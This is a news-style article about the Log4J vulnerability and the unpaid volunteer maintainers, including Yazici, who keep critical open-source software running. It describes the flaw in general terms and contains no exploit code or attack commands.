The internet runs on free open source software. Who pays to fix it?

The vulnerability in Log4J is very easy to exploit. After sending a malicious string of characters to a vulnerable machine, hackers can run any code they want. Some of the earliest attacks involved children pasting malicious code into Minecraft servers. Hackers, including some with ties to China and Iran, are now trying to… exploit the vulnerability in any machine they can find running the flawed code.

And there is no clear end in sight. The Log4J problem amounts to a protracted security crisis that is expected to last for months or years. Jen Easterly, director of the US Cybersecurity and Infrastructure Security Agency, has said it is “one of the most serious flaws” she has ever seen.

For something so important, you’d expect the world’s largest tech companies and governments to contract hundreds of highly paid experts to quickly fix the flaw.

The truth is different: Long a critical part of the internet infrastructure, Log4J was founded as a volunteer project and is still run largely for free, even though many multimillion- and multi-billion dollar companies rely on it and benefit from it every day. Yazici and his team try to fix it for next to nothing.

This strange situation is routine in the world of open-source software, programs that allow anyone to inspect, modify, and use their code. It’s a decades-old idea that has become crucial to the functioning of the Internet. When things go well, open source is a collective triumph. If it goes wrong, it is a great danger.

“Open source controls the Internet and, by extension, the economy,” said Filippo Valsorda, a developer who works on open source projects at Google. And yet, he explains, “even for core infrastructure projects, it’s very common to have a small team of administrators, or even a single maintainer who isn’t paid to work on that project.”

No recognition

“The team works around the clock,” Yazici told me by email when I first contacted him. “And my shift from 6 a.m. to 4 p.m. (no, there’s no typo in the time) just ended.”

In the midst of his long days, Yazici took the time to point the finger at critics, tweet that “Log4j administrators have been working sleeplessly on mitigation measures; fixes, docs, CVE, answers to questions, etc. But nothing stops people from bashing us, for work we don’t get paid for, for a feature we all don’t like but must keep due to backward compatibility concerns. ”

Leave a Comment

Your email address will not be published. Required fields are marked *